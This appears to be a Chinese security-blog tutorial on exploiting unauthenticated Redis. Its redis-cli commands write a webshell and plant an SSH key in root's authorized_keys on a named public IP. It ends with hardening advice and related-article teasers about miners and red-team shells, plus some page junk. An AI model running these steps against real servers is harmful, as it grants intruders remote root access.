<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Redis未授權漏洞

    VSole2021-11-19 22:05:17

     Redis 默認情況下,會綁定在 本地6379端口,如果沒有進行相關策略,會將 Redis 服務暴露到公網上,在沒有設置密碼認證(默認為空)的情況下,任意用戶在可以訪問目標服務器的情況下未授權訪問Redis 以及讀取 Redis 的數據。攻擊者在未授權訪問 Redis 的情況下,利用 Redis 自身的提供的config 命令,可以進行寫文件操作,可以將ssh公鑰寫入目標服務器的 /root/.ssh/authotrized_keys 文件中,進而可以使用對應私鑰直接使用ssh服務登錄目標服務器、添加計劃任務、寫入Webshell等操作。

        靶機是Jacky馬的服務器,快到期了就沒脫敏。

    環境搭建

    wget http://download.redis.io/releases/redis-2.8.17.tar.gz

    tar xzvf redis-2.8.17.tar.gz  #解壓安裝包
    cd redis-2.8.17  # 進入redis目錄
    make #編譯
    

    cd src/                       #進入src目錄 
    cp redis-server /usr/bin/ 
    cp redis-cli /usr/bin/       #將redis-server和redis-cli拷貝到/usr/bin目錄下
    cd ..                         # 返回上一級目錄
    cp redis.conf /etc/           #將redis.conf拷貝到/etc/目錄下
    redis-server /etc/redis.conf  # 使用/etc/目錄下的redis.conf文件中的配置啟動redis服務
     # 服務啟動成功。redis-server啟動redis數據庫服務
    

    探測漏洞

    先用 nmap 探測靶機的端口開放情況,意思一下;

    Nmap -A -p 6379 --script redis-info 122.51.10.27
    

    Redis在默認配置空口了登陸,如果其默認端口6379對外開放的話,則可以遠程訪問,因此默認配置下的Redis我們可以直接連接并獲取敏感信息。

    redis-cli -h 122.51.10.27 -p 6379
    

    方法一:直接寫shell

    如果目標開啟了80端口,可以直接寫shell到網站目錄

    config set dir /var/www/html  #靶機 Web 網站的目錄
    config set db filename test123.php   # 寫入的文件名
    set webshell  ""   # shell內容
    save    # 保存
    

    shell寫入成功,可以直接連接。

    方法二:結合 SSH 免密碼登錄

    所謂" 公鑰登錄",就是用戶將自己的公鑰儲存在遠程主機上。登錄時遠程主機會向用戶發送一段隨機字符串,用自己的私鑰加密后再發回來。遠程主機用事先儲存的公鑰進行解密,如果成功則允許直接空密碼ssh登錄。

    ①開啟ssh服務

    service ssh start     # 開啟ssh服務
    /etc/init.d/ssh status   # 查看ssh狀態
    

    ②在本地生成公鑰文件

    ssh-keygen -trsa  
    

    ③連接 Redis 寫入文件

    將里面的內容寫入遠程的 Redis 服務器上并且設置其 Key為 test命令如下

    (echo -e ""; cat /root/.ssh/id_rsa.pub; echo -e "") > test123.txt
    cat test123.txt | redis-cli -h 122.51.10.27 -x set test
    

    報錯,說主機處于保護模式只允許redis本地鏈接,需要修改配置文件../redis.conf 需要在服務器上關閉保護模式:

    再次上傳,成功

    登錄遠程服務器可以看到公鑰已經添加到 Redis 的服務器上了命令如下

    redis-cli -h 122.51.10.27 -p 6379
    keys *
    get test
    config set dir "/root/.ssh"  #保存的路徑
    config set dbfilename "authorized_keys"  # 保存的文件名
    save  #將test里的公鑰保存到/root/.ssh/authotrized_keys文件中(要有寫權限)
    # 最后就可以測試連接了
    ssh –i  id_rsa root@122.51.10.27
    

    修復建議:

    1./etc/redis.conf 中找到 “requirepass” 字段在后面設置復雜口令

    2./etc/redis.conf中配置protected-mode yes

    3.更改默認端口

    sshredis
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Scanners-Box 指引#簡介#Scanners-Box是一個集合github平臺上的安全行業從業人員自研開源掃描器的倉庫,包括子域名枚舉、數據庫漏洞掃描、弱口令或信息泄漏掃描、端口掃描、指紋識別以及其他大型掃描器或模塊化掃描器;該倉庫只收錄各位網友自己編寫的一般性開源掃描器,類似nmap、w3af、brakeman等知名掃描工具不收錄。
    └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.con. Active: active since 一 2021-07-12 10:05:01 CST; 4h 52min ago. 真不巧,看起來不是注冊到 systemd 的,那么是誰拉起來的呢?啊,是 crontab非常不巧,我當時一心想找是哪個 service,沒注意到 crontab 的存在,還以為上次的那個挖礦木馬換了個 service 的名字,還去這個路徑找了好久,找了半天也沒有看到惡意的 service 啊突然想到我還沒看 crontab于是打開crontab發現了一條指令他靜靜的呆在那里像是在嘲笑我太菜了,這個套路都沒注意到 :P于是,注釋掉這行,然后對著剛剛 systemd 輸出的三個進程一頓 kill ├─2075 tOAK5Ejl
    └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.con. Active: active since 一 2021-07-12 10:05:01 CST; 4h 52min ago. 真不巧,看起來不是注冊到 systemd 的,那么是誰拉起來的呢?啊,是 crontab非常不巧,我當時一心想找是哪個 service,沒注意到 crontab 的存在,還以為上次的那個挖礦木馬換了個 service 的名字,還去這個路徑找了好久,找了半天也沒有看到惡意的 service 啊突然想到我還沒看 crontab于是打開crontab發現了一條指令他靜靜的呆在那里像是在嘲笑我太菜了,這個套路都沒注意到 :P于是,注釋掉這行,然后對著剛剛 systemd 輸出的三個進程一頓 kill├─2075 tOAK5Ejl
    實戰 | 挖礦木馬排查
    2023-02-22 10:05:36
    └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.con. Active: active since 一 2021-07-12 10:05:01 CST; 4h 52min ago. 真不巧,看起來不是注冊到 systemd 的,那么是誰拉起來的呢?啊,是 crontab非常不巧,我當時一心想找是哪個 service,沒注意到 crontab 的存在,還以為上次的那個挖礦木馬換了個 service 的名字,還去這個路徑找了好久,找了半天也沒有看到惡意的 service 啊突然想到我還沒看 crontab于是打開crontab發現了一條指令他靜靜的呆在那里像是在嘲笑我太菜了,這個套路都沒注意到 :P于是,注釋掉這行,然后對著剛剛 systemd 輸出的三個進程一頓 kill├─2075 tOAK5Ejl
    網上安全滲透測試工具整理全集,部分鏈接可能失效,但可以搜索到
    Web Hacking 101 中文版:https://wizardforcel.gitbooks.io/web-hacking-101/content/ 淺入淺出Android安全 中文版:https://wizardforcel.gitbooks.io/asani/content/ Android 滲透測試學習手冊 中文
    漏洞及滲透練習平臺 數據庫注入練習平臺 花式掃描器 信息搜集工具 WEB工具 windows域滲透工具 漏洞利用及攻擊框架 漏洞POC&EXP 中間人攻擊及釣魚 密碼pj 二進制及代碼分析工具 EXP編寫框架及工具 隱寫相關工具 各類安全資料 各類CTF資源 各類編程資源 Python
    2020年9月 ,AWAKE Security的Patrick Olsen調查并報告了僅攜帶XMR Miner有效載荷的僵尸網絡的早期版本。僵尸網絡目前正在使用Weblogic漏洞進行傳播。殺死正在運行的進程,潛在地爭奪挖掘工具并消除EDR。shellscript xms通過curl從bash傳遞到bash,以防萬一失敗,使用wget對其進行提取,執行和刪除,以防止分析。使用base64編碼命令來獲取并執行python腳本,以避免檢測和分析。第一組下載并運行Miner二進制文件和隨附的shell腳本,維護持久性并下載并運行第二組python腳本。
    成功getshell后通過冰蝎上傳了一個哥斯拉shell接下來就是socks5代理了,上傳一個frp后發現服務端關了,事發突然并沒有做什么權限維持,到手的shell飛了經過分析和思考,造成這種情況的原因是直接拿了編譯好的frp沒做免殺,也許內網有全流量,設備報警提醒了,管理員發現異常后直接關機了。
    這是本系列第三篇文章,依舊是某省HVV紅隊的經歷。 過程中只用到很簡單的方法,所以加了個標題“有手就行”。 這家企業在內網犯了幾乎所有能犯的錯誤,打起來也比較順利,只不過當時被管理員發現了,爭分奪秒的過程也比較有趣哈哈。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类